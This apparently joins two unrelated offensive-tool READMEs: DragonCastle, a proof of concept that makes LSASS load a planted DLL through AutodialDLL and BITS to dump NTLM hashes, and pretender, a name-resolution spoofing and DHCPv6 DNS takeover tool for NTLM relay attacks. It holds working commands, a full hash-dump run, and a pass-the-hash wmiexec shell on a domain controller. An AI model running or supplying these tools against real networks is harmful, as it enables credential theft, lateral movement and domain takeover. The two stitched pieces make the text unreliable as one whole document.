A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.
Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.
The DLLMain always returns False
so the processes doesn't keep it.
It only works when RunAsPPL
is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:
Build | Support |
---|---|
Windows 10 version 21H2 | |
Windows 10 version 21H1 | Implemented |
Windows 10 version 20H2 | Implemented |
Windows 10 version 20H1 (2004) | Implemented |
Windows 10 version 1909 | Implemented |
Windows 10 version 1903 | Implemented |
Windows 10 version 1809 | Implemented |
Windows 10 version 1803 | Implemented |
Windows 10 version 1709 | Implemented |
Windows 10 version 1703 | Implemented |
Windows 10 version 1607 | Implemented |
Windows 10 version 1511 | |
Windows 10 version 1507 | |
Windows 8 | |
Windows 7 |
The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.
psyconauta@insulanova:~/Research/dragoncastle|β python3 dragoncastle.py -h
DragonCastle - @TheXC3LL
usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]
DragonCastle - A credential dumper (@TheXC3LL)
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid doma in name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value
</ pre>
Windows server on 192.168.56.20
and Domain Controller on 192.168.56.10
:
psyconauta@insulanova:~/Research/dragoncastle|β python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll
DragonCastle - @TheXC3LL
[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:
============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977 b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
============
[+] Deleting DLL
[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|β wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark
C:\>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivile ge Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege En able computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
C:\>
Juan Manuel FernΓ‘ndez (@TheXC3LL)
Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing
pretender
is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender
primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender
. It is designed to work with tools such as Impacket's ntlmrelayx.py
and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.
Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.
To get a feel for the situation in the local network, pretender
can be started in --dry
mode where it only logs incoming queries and does not answer any of them:
pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements
To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender
like this:
pretender -i eth0
You can disable certain attacks with --no-dhcp-dns
(disabled DHCPv6, DNS and router advertisements), --no-lnr
(disabled mDNS, LLMNR and NetBIOS-NS), --no-mdns
, --no-llmnr
, --no-netbios
and --no-ra
.
If ntlmrelayx.py
runs on a different host (say 10.0.0.10
/fe80::5
), run pretender
like this:
pretender -i eth0 -4 10.0.0.10 -6 fe80::5
Pretender can be setup to only respond to queries for certain domains (or all but certain domains) and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender
. See the following example:
pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn
For more information, run pretender --help
.
ntlmrelayx.py
with the -6
flag--stop-after
and main.vendorStopAfter
)--no-host-info
or main.vendorNoHostInfo
--interfaces
--no-ipv6-lnr
/main.vendorNoIPv6LNR
--spoof-for
/--dont-spoof-for
). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
CGO_ENABLED=1
) or a Go implementation (CGO_ENABLED=0
) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.hostinfo/mac-vendors.txt
. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor
(the MAC prefix length can be arbitrary).--no-lnr
and --spoof-types SOA
to ignore any queries that are unrelated to the attack.krbrelayx.py
runs on a different host than pretender (relay IPv4 address points to different host that runs krbrelayx.py
), the host running krbrelayx.py
will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.Pretender can be build as follows:
go build
Pretender can also be compiled with pre-configured settings. For this, the ldflags
have to be modified like this:
-ldflags '-X main.vendorInterface=eth1'
For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:
GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'
Full list of vendoring options (see defaults.go
or pretender --help
for detailed information):
vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces